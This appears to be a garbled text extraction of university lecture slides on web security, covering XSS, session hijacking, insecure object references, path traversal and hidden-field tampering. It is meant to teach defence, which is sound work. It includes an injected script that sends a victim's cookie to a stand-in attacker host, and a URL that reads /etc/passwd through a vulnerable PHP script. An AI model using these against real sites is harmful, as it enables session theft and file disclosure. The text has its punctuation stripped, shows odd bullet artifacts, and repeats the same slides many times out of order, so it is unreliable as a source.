Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
